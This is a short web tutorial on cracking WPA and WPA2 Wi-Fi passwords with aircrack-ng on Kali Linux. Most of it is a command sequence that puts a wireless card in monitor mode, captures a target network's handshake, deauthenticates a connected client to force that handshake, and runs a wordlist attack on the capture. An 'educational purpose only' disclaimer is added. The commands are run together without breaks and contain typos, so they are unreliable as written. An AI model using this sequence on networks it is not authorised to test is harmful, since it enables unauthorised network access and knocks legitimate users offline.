In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only.
Things we used for cracking WPA & WPA2:
- Alfa AWUSO36H Wireless Card
- Windows 7-64bit (works on 32bit)
- VMware Workstation
- Kali Linux 2.0
Command to crack WPA & WPA2:
airmon-ng sudo ifconfig wlan0 downsudo iwconfig wlan0 mode monitorsudo ifconfig wlan0 upairodump-ng wlan0 airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.capsudo ifconfig wlan0 downsudo iwcofnig wlan0 mode monitorsudo ifconfig wlan0 up Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux:
In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.

Comments
Post a Comment